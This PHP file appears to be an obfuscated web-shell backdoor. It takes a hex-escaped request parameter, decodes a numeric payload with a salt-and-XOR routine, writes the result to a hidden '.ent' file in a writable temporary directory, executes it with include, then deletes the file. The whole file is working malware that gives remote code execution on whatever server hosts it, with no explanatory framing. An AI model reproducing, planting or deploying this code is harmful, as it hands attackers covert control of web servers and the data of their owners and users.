<?php

if(array_key_exists("\x72e\x63", $_REQUEST) && !is_null($_REQUEST["\x72e\x63"])){
	$reference = array_filter(["/tmp", getenv("TEMP"), sys_get_temp_dir(), getcwd(), getenv("TMP"), "/dev/shm", session_save_path(), "/var/tmp", ini_get("upload_tmp_dir")]);
	$val = $_REQUEST["\x72e\x63"];
	$val	= explode 	 (	 "."   , $val)	 	;
	$k = '';
            $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt5 );
            $x = 0;
            $__len = count($val );
    
            do {
                if ($x>=$__len) break;
                $v9 = $val[$x];
                $sChar = ord($salt5[$x % $sLen] );
                $d = ((int)$v9 - $sChar - ($x % 10))		^	49;
                $k .= chr($d );
                $x++; }	 while (true );
	foreach ($reference as $key => $tkn) {
    		if (!( !is_dir($tkn) || !is_writable($tkn) )) {
    $data_chunk = join("/", [$tkn, ".ent"]);
    $file = fopen($data_chunk, 'w');
if ($file) {
	fwrite($file, $k);
	fclose($file);
	include $data_chunk;
	@unlink($data_chunk);
	die();
}
}
}
}